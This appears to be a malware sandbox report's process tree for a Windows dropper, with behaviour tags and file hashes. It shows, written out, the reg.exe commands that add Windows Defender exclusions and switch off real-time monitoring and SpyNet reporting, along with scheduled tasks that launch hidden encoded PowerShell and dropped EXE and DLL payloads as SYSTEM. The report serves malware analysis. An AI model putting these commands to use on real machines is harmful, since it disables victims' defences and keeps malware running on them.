- Suspicious use of WriteProcessMemory
PID:1876 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:988
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:816
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1964 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1104 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1172
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1188
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gEsdqCDlV" /SC once /ST 04:23:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1660
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gEsdqCDlV"4⤵PID:1848
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gEsdqCDlV"4⤵PID:2008
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bkCaKdRAMkWPSejAIR" /SC once /ST 09:29:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\TZDtwbxgOiHNmJmUm\aYFlcztADIsXWVi\UVqXlMo.exe\" BI /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2040
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {EEED3171-1832-4670-B5C7-4AB020781A5C} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]1⤵PID:1616
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:964 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1272
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1580 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1012
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1620 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:424
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1752 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:328
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1108
-
C:\Windows\system32\taskeng.exetaskeng.exe {337202B8-36DF-420F-A7DA-1F94E9B0F803} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:616
-
C:\Users\Admin\AppData\Local\Temp\TZDtwbxgOiHNmJmUm\aYFlcztADIsXWVi\UVqXlMo.exeC:\Users\Admin\AppData\Local\Temp\TZDtwbxgOiHNmJmUm\aYFlcztADIsXWVi\UVqXlMo.exe BI /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1912 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gMwdwEWMa" /SC once /ST 03:06:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1904
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gMwdwEWMa"3⤵PID:816
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gMwdwEWMa"3⤵PID:368
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:832
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:936
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1972
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:268
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ghrcRqTDZ" /SC once /ST 05:54:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2020
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ghrcRqTDZ"3⤵PID:1572
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ghrcRqTDZ"3⤵PID:1840
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zQkKlpNdciTvYFUB" /t REG_DWORD /d 0 /reg:323⤵PID:1036
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zQkKlpNdciTvYFUB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1368
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zQkKlpNdciTvYFUB" /t REG_DWORD /d 0 /reg:643⤵PID:768
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zQkKlpNdciTvYFUB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1488
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zQkKlpNdciTvYFUB" /t REG_DWORD /d 0 /reg:323⤵PID:1592
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zQkKlpNdciTvYFUB" /t REG_DWORD /d 0 /reg:324⤵PID:892
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zQkKlpNdciTvYFUB" /t REG_DWORD /d 0 /reg:643⤵PID:936
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zQkKlpNdciTvYFUB" /t REG_DWORD /d 0 /reg:644⤵PID:1300
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\zQkKlpNdciTvYFUB\BBzNDzod\qhjgqWLHQhcVeIQr.wsf"3⤵PID:524
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\zQkKlpNdciTvYFUB\BBzNDzod\qhjgqWLHQhcVeIQr.wsf"3⤵
- Modifies data under HKEY_USERS
PID:1820 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JjXKhaNsdWYOC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1572
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JjXKhaNsdWYOC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:816
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\THJtcQhgWvnU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\THJtcQhgWvnU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1172
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\alnSasXUPlGcllamlWR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1460
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\alnSasXUPlGcllamlWR" /t REG_DWORD /d 0 /reg:644⤵PID:1112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pOuhVTeSU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pOuhVTeSU" /t REG_DWORD /d 0 /reg:644⤵PID:1664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ssaUiutRRYUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1660
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ssaUiutRRYUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1580
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\iaQnfTLRJLxsdTVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\iaQnfTLRJLxsdTVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1488
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\TZDtwbxgOiHNmJmUm" /t REG_DWORD /d 0 /reg:324⤵PID:892
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\TZDtwbxgOiHNmJmUm" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1300
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zQkKlpNdciTvYFUB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1472
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zQkKlpNdciTvYFUB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2020
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JjXKhaNsdWYOC" /t REG_DWORD /d 0 /reg:324⤵PID:1156
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JjXKhaNsdWYOC" /t REG_DWORD /d 0 /reg:644⤵PID:816
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\THJtcQhgWvnU2" /t REG_DWORD /d 0 /reg:324⤵PID:1092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\THJtcQhgWvnU2" /t REG_DWORD /d 0 /reg:644⤵PID:588
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\alnSasXUPlGcllamlWR" /t REG_DWORD /d 0 /reg:324⤵PID:824
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\alnSasXUPlGcllamlWR" /t REG_DWORD /d 0 /reg:644⤵PID:1624
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pOuhVTeSU" /t REG_DWORD /d 0 /reg:324⤵PID:1984
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pOuhVTeSU" /t REG_DWORD /d 0 /reg:644⤵PID:1840
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ssaUiutRRYUn" /t REG_DWORD /d 0 /reg:324⤵PID:656
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ssaUiutRRYUn" /t REG_DWORD /d 0 /reg:644⤵PID:1848
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\iaQnfTLRJLxsdTVB" /t REG_DWORD /d 0 /reg:324⤵PID:768
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\iaQnfTLRJLxsdTVB" /t REG_DWORD /d 0 /reg:644⤵PID:1476
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\TZDtwbxgOiHNmJmUm" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:892
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\TZDtwbxgOiHNmJmUm" /t REG_DWORD /d 0 /reg:644⤵PID:1020
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zQkKlpNdciTvYFUB" /t REG_DWORD /d 0 /reg:324⤵PID:2036
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zQkKlpNdciTvYFUB" /t REG_DWORD /d 0 /reg:644⤵PID:1176
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gvzPpMIPC" /SC once /ST 01:25:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1572
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gvzPpMIPC"3⤵PID:1996
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gvzPpMIPC"3⤵PID:884
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1660
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1772
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1192
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:768
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WfNBsQJtbgJIxpVus" /SC once /ST 03:13:26 /RU "SYSTEM" /TR "\"C:\Windows\Temp\zQkKlpNdciTvYFUB\INAcnmKdyWWtlLY\hKuDlSk.exe\" q9 /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1108
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "WfNBsQJtbgJIxpVus"3⤵PID:936
-
-
-
C:\Windows\Temp\zQkKlpNdciTvYFUB\INAcnmKdyWWtlLY\hKuDlSk.exeC:\Windows\Temp\zQkKlpNdciTvYFUB\INAcnmKdyWWtlLY\hKuDlSk.exe q9 /site_id 525403 /S2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1344 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bkCaKdRAMkWPSejAIR"3⤵PID:1528
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1472
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:1820
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1052
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:324
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\pOuhVTeSU\xGMiEb.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "POjviKGjNxHsMlV" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1396
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "POjviKGjNxHsMlV2" /F /xml "C:\Program Files (x86)\pOuhVTeSU\TCvzJeG.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1844
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "POjviKGjNxHsMlV"3⤵PID:1752
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "POjviKGjNxHsMlV"3⤵PID:1148
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "IqemvBcnPGehXq" /F /xml "C:\Program Files (x86)\THJtcQhgWvnU2\RUpCUNK.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1212
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "oXjKVBGpEkfTx2" /F /xml "C:\ProgramData\iaQnfTLRJLxsdTVB\MftvtRF.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1336
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "oSjAiNSEywSHPeWoX2" /F /xml "C:\Program Files (x86)\alnSasXUPlGcllamlWR\gEUdftX.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1864
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "mKpqzedPJLuCFXZRihq2" /F /xml "C:\Program Files (x86)\JjXKhaNsdWYOC\lhTbUAF.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1564
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cnCceyBMwkDvrDDBZ" /SC once /ST 08:35:21 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\zQkKlpNdciTvYFUB\xHzUfXdO\pYNyVwL.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:964
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "cnCceyBMwkDvrDDBZ"3⤵PID:1592
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:992
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:968
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:332
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:1176
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "WfNBsQJtbgJIxpVus"3⤵PID:736
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\zQkKlpNdciTvYFUB\xHzUfXdO\pYNyVwL.dll",#1 /site_id 5254032⤵PID:936
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\zQkKlpNdciTvYFUB\xHzUfXdO\pYNyVwL.dll",#1 /site_id 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2028 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "cnCceyBMwkDvrDDBZ"4⤵PID:1896
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1776
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1632
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "75598777513754684001221010220-925407897-1051527500153274371416042908521475499910"1⤵
- Windows security bypass
PID:1664
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:828
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD550b0a33590599f3c3c601e9ef62c8a07
SHA1ee71405599d8fe4aac487d49240cccdd4b62eec0
SHA256e59836020dcd565a30d1e52b9042d01215ca8f660388fda944f9a2df001ffa71
SHA51294e5404de8a62ebeb41cec2ca1de5d66bc781aa50841a3d3ed80065a82e069265a5cc96eb65938b9907af186a96710c3ce8bd635d89c8177ab1c95f000d82840
-
Filesize
2KB
MD51848b67353e48a5a98c6af6f39c09f2d
SHA15b504919eddcb706c42124600160cbb9ecc91c5b
SHA25638cb5cbf618ec2e7820f27bd4806cb0ecbd07556687e07544bce3e25754cb909
SHA51250f788a7a857df3ca661578a50785c47e29424b1fc900242d05eab76ebcc2d2f4c04b0bb03b59f0c371141737c1abb4a3913cb029b9e067eba75cb38fecffc42
-
Filesize
2KB
MD5bbc0faf659b5f7c38351f787b6698886
SHA18987d77893a0ea158c326dbe10daf10d5706f755
SHA256cba0402da26b201f19be8bee65c6276727b51c6429e5502d63acf52a74a78b8e
